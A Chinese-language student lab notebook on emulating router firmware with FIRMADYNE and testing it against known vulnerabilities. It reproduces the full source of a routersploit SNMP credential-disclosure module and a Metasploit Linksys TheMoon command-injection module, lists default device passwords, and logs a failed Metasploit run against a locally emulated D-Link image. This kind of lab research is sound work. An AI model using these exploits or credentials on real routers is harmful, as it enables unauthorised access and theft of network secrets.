###### tags: `firmadyne` `security` # FIRMADYNE--Firmware with Vulnerability ## Select filename from analysis_results where routersploit_result_vuln!=’Nothing’: 本來學長是要我用sql語法來找routersploit_result_vlun != 'Nothing'的,可是我不會sql,查了一整天還是弄不太會…所以我就想說那我就人體select一下好了,然後就先找了以下幾個sql檔裡面說有洞的,反正說不定這幾個我就要用很久了~ 後來我跟書銘討論了一下,發現可以用postgreSQL, 然後創一個新的database,再把sql檔裡面的第一行那個connect改成新的dbname,一開始沒有改,結果我本來的db就被蓋掉了… 1. 創database ```sql= sudo -u postgres createdb vulns ``` 2. import ```sql= sudo -u postgres psql -d vulns < ./firmware190405_1527.sql ``` 3. 進cmd ```sql= sudo -u postgres psql -d vulns ``` 進去之後就可以下學長跟我說的指令了嘻嘻,然後因為自己需要,所以就加了id,好放便我自己記錄的時候可以用id就好~ 4. select ```sql= Select id, filename from analysis_results where routersploit_result_vuln!='Nothing'; ``` ### 4004 ```sql= (4004, 'NWA1121-NI_2.10(AABJ.0)C0.zip', 'Nothing', 'service:telnet, user:admin, pass:1234 ', 'Thomson TWG849 Info Disclosure Linksys E-Series TheMoon RCE ', ''), ``` \ id=1 第一個看到的是id==4004的這個,他的routersploit_result_vuln這個column裡面有說有兩個洞: 1. **Thomson TWG849 Info Disclosure** 把這個洞的名子拿去google,看一下這個漏洞主要是在說什麼,就可以找到兩樣相關的東西: * 這個漏洞的敘述 這個漏洞主要是先發現在thomson twg849上面的,他在說明的是在某些router上,是用SNMP這個protocol在管理的,本來的用意是讓管理端可以打request去代理端那邊要一些user的資訊,但是在這個router上,他的MIBs允許local/remote的network-users也可以一跟管理端一樣,只要打request就可以拿到一些不應該被知道的資訊,像是**user interface credentials**、**wireless network key value**之類的。那如果SNMPv1跟SNMPv2沒有提供足夠的保護,那就有可能用default的read-only community"private"就可以拿到上述的機密資訊。 reference:https://packetstormsecurity.com/files/133631/Thomson-CableHome-Gateway-DWG849-Information-Disclosure.html * 在Routersploit上,這個sploit的Source Code ```python= from routersploit.core.exploit import * from routersploit.core.snmp.snmp_client import SNMPClient class Exploit(SNMPClient): __info__ = { "name": "Thomson TWG849 Info Disclosure", "description": "Module exploits Thomson TWG849 information disclosure vulnerability which allows reading sensitive information.", "authors": ( "Sebastian Perez", # vulnerability discovery "Marcin Bury <marcin[at]threat9.com>", # routersploit module ), "references": ( "https://packetstormsecurity.com/files/133631/Thomson-CableHome-Gateway-DWG849-Information-Disclosure.html", ), "devices": ( "Thomson TWG849", ) } target = OptIP("", "Target IPv4 or IPv6 address") port = OptPort(161, "Target SNMP port") verbosity = OptBool(False, "Enable verbose output: true/false") def __init__(self): self.oids = { # make, model, software version "model": "1.3.6.1.2.1.1.1.0", "uptime": "1.3.6.1.2.1.1.3.0", # web interface credentials "username": "1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0", "password": "1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0", # ssid and key "ssid1": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32", "ssid2": "1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32", # guest network oids "guest1": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33", "guest2": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34", "guest3": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35", } def run(self): res = [] print_status("Reading parameters...") for name in self.oids.keys(): snmp_client = self.snmp_create() snmp = snmp_client.get("private", self.oids[name]) if snmp: value = str(snmp[0][1]) if value: res.append((name, value)) if res: print_success("Exploit success") print_table(("Parameter", "Value"), *res) else: print_error("Exploit failed - could not read sensitive information") @mute def check(self): snmp_client = self.snmp_create() snmp = snmp_client.get("private", "1.3.6.1.2.1.1.1.0") if snmp: return True # target is not vulnerable return False # target is vulnerable ``` 2. **Linksys E-Series TheMoon RCE** 一樣把這個名子拿去google,然後也可以找到這個漏洞的敘述跟他在metasploit上的source code - 這個漏洞的敘述 跟The Moon這隻蠕蟲有關~ - 在Metasploit上,這個sploit的Source Code ```ruby= ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Linksys E-Series TheMoon Remote Command Injection', 'Description' => %q{ Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command injection. This vulnerability was used from the so-called "TheMoon" worm. There are many Linksys systems that are potentially vulnerable, including E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, and E900. This module was tested successfully against an E1500 v1.0.5. }, 'Author' => [ 'Johannes Ullrich', #worm discovery 'Rew', # original exploit 'infodox', # another exploit 'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'EDB', '31683' ], [ 'BID', '65585' ], [ 'OSVDB', '103321' ], [ 'PACKETSTORM', '125253' ], [ 'PACKETSTORM', '125252' ], [ 'URL', 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ], [ 'URL', 'https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630' ] ], 'DisclosureDate' => 'Feb 13 2014', 'Privileged' => true, 'Platform' => %w{ linux unix }, 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], [ 'Linux mipsbe Payload', { 'Arch' => ARCH_MIPSBE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'WfsDelay' => 30 } )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def execute_command(cmd, opts) begin res = send_request_cgi({ 'uri' => '/tmUnblock.cgi', 'method' => 'POST', 'encode_params' => true, 'vars_post' => { "submit_button" => "", "change_action" => "", "action" => "", "commit" => "0", "ttcp_num" => "2", "ttcp_size" => "2", "ttcp_ip" => "-h `#{cmd}`", "StartEPI" => "1" } }, 2) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def check begin res = send_request_cgi({ 'uri' => '/tmUnblock.cgi', 'method' => 'GET' }) if res && [200, 301, 302].include?(res.code) return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("Trying to access the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end print_status("Exploiting...") execute_cmdstager({:flavor => :wget}) end end ``` code很多一時之間也看不完,所以就想說還是先架起來比較實在哈哈! #### NWA1121-NI_2.10(AABJ.0)C0.zip 1. 之前改過dir就不用再改了 2. 下載[NWA1121-NI_2.10(AABJ.0)C0.zip](ftp://ftp.zyxel.com/NWA1121-NI/firmware/NWA1121-NI_2.10(AABJ.0)C0.zip) 3. recover only the filesystem ``` ./sources/extractor/extractor.py -b Zyxel -sql 127.0.0.1 -np -nk "NWA1121-NI_2.10(AABJ.0)C0.zip" images ``` 4. Identify the architecture of firmware 1 and store the result in the image table of the database. ``` ./scripts/getArch.sh ./images/1.tar.gz ``` 5. Load the contents of the filesystem for firmware 1 into the database, populating the object and object_to_image tables. ``` ./scripts/tar2db.py -i 1 -f ./images/1.tar.gz ``` 6. Create the QEMU disk image for firmware 1. ``` sudo ./scripts/makeImage.sh 1 ``` 7. Infer the network configuration for firmware 1. ``` ./scripts/inferNetwork.sh 1 ``` ![](https://i.imgur.com/4jwnctq.png) 結果跟書銘一樣,沒有interface,既然這樣,我就可說等書銘如果處理完了,我再回來做這個好了,所以我決定先去做下一個~ ### 4103 ```sql= (4103, 'DAP-1520_REVA_FIRMWARE_1.05.B02.ZIP', 'Nothing', 'Nothing', 'Linksys E-Series TheMoon RCE ', ''), ``` id=2 這次我想說我還是先可以架起來,我再來看看他的洞是什麼好了,不然看那麼多如果還是不能測也是沒用~ #### DAP-1520_REVA_FIRMWARE_1.05.B02.ZIP 1. 之前改過dir就不用再改了 2. 下載[DAP-1520_REVA_FIRMWARE_1.05.B02.ZIP](ftp://ftp2.dlink.com/PRODUCTS/DAP-1520/REVA/DAP-1520_REVA_FIRMWARE_1.05.B02.ZIP) 3. recover only the filesystem ``` ./sources/extractor/extractor.py -b D-link -sql 127.0.0.1 -np -nk "DAP-1520_REVA_FIRMWARE_1.05.B02.ZIP" images ``` 4. Identify the architecture of firmware 2 and store the result in the image table of the database. ``` ./scripts/getArch.sh ./images/2.tar.gz ``` 5. Load the contents of the filesystem for firmware 2 into the database, populating the object and object_to_image tables. ``` ./scripts/tar2db.py -i 2 -f ./images/2.tar.gz ``` 6. Create the QEMU disk image for firmware 2. ``` sudo ./scripts/makeImage.sh 2 ``` 7. Infer the network configuration for firmware 2. ``` ./scripts/inferNetwork.sh 2 ``` ![](https://i.imgur.com/CYI1YZr.png) ip是192.168.0.50 \ 8. Emulate firmware 2 with the inferred network configuration. ``` ./scratch/2/run.sh ``` ![](https://i.imgur.com/Pm2NuCR.png) 停在這裡之後本來想說是不是壞掉了,不過後來我直接去連網頁,還是連上去了,雖然不知道為什麼停在這邊,不過想說竟然可以用的話,還是先來試試看好了。 ![](https://i.imgur.com/FnN91km.png) 這個firmware的cve跟上面一樣是Linksys E-Series TheMoon RCE的洞,前面有說到他包在metasploit裡面,所以就來試試看吧! 1. 先用nmap掃一下看看有沒有可以連的port 發現有53/tcp 跟80/http可以用,等等應該就會用到80這個port,先記著 ``nmap -sV -Pn 192.168.0.50`` ![](https://i.imgur.com/5ojVad1.png) 2. 再來要把postgreSQL的server架起來, ``/etc/init.d/postgresql start`` ![](https://i.imgur.com/9u1SzqF.png) 3. 接著就可以開matesploit了!! ``msfconsole`` ```[-] No local database connected. Please connect to a local database before connecting to a remote data service. [-] *** [-] * WARNING: No database support: could not connect to server: Connection refused Is the server running on host "127.0.0.1" and accepting TCP/IP connections on port 5433? [-] *** ``` ![](https://i.imgur.com/c3HDtku.png) 在這個時候我遇到一個問題,所以就去google了一下,發現是因為我的msfconsole想去listen 5432這個port,可是他已經被用了,所以要改一下 先start ``service postgresql start`` 然後看一下是不是有兩個人想用同一個port ``ss -lntp | grep post`` ![](https://i.imgur.com/70NmdgY.png) 這邊因為我已經改過了,所以就只有一個service會用到5432,下面是改到5433port的指令: ```sql= sed -i 's/\(port = \)5433/\15432/' /etc/postgresql/9.6/main/postgresql.conf ``` 然後就把sql restart: ``service postgresql restart`` ``msfdb reinit`` 這時候再重新msfconsole一次就不會再噴一樣的錯了~ ![](https://i.imgur.com/LRAwC8T.png) 進來之後先下 ``search E3200`` 就可以看到他說確實有這個洞,所以接著就use他,然後再看一下``options``,看一下有YES可是我們還沒填的是RHOST,也就是我們要打的IP,發現RHOSTS還是空的,所以就把RHOSTS set到``192.168.0.50``然後確認RPORT就是我們上面用nmap掃的80,最後也順便看一下我們的payload是不是mipsel,如果是mipsbe的話就要改一下~ ![](https://i.imgur.com/wu1q2iI.png) 接著就打``exploit``!看看是不是會有一樣的漏洞可以用!可是結果他說沒有create任何session… ![](https://i.imgur.com/kwdFPW8.png) ### 4541 ```sql= (4541, 'NWA1123-AC_v2.10(AAOX.2)C0.zip', 'Nothing', 'service:telnet, user:admin, pass:1234 ', 'Thomson TWG849 Info Disclosure Linksys E-Series TheMoon RCE ', ''), ``` id=3 這個也沒有interface… ![](https://i.imgur.com/ni3KeDd.png) ### 4554 ```sql= (4554, 'V200AAQF2b10.zip', 'Nothing', 'service:ftp, user:admin, pass:1234 service:ftp, user:supervisor, pass:zyad1234 service:telnet, user:admin, pass:1234 ', 'Zyxel P660HN-T v2 RCE ', ''), ``` ### 4588 ```sql= (4588, 'V300ABCG8C0.zip', 'Nothing', 'Nothing', 'Thomson TWG849 Info Disclosure Zyxel P660HN-T v2 RCE ', ''), ``` ### 4553 ```sql= (4553, 'V300ABCG8H0.zip', 'Nothing', 'service:telnet, user:admin, pass:1234 ', 'Thomson TWG849 Info Disclosure Zyxel P660HN-T v2 RCE ', ''), ### 4590 ``` ```sql= (4590, 'V300ABCG8I0.zip', 'Nothing', 'Nothing', 'Thomson TWG849 Info Disclosure Zyxel P660HN-T v2 RCE ', ''), ```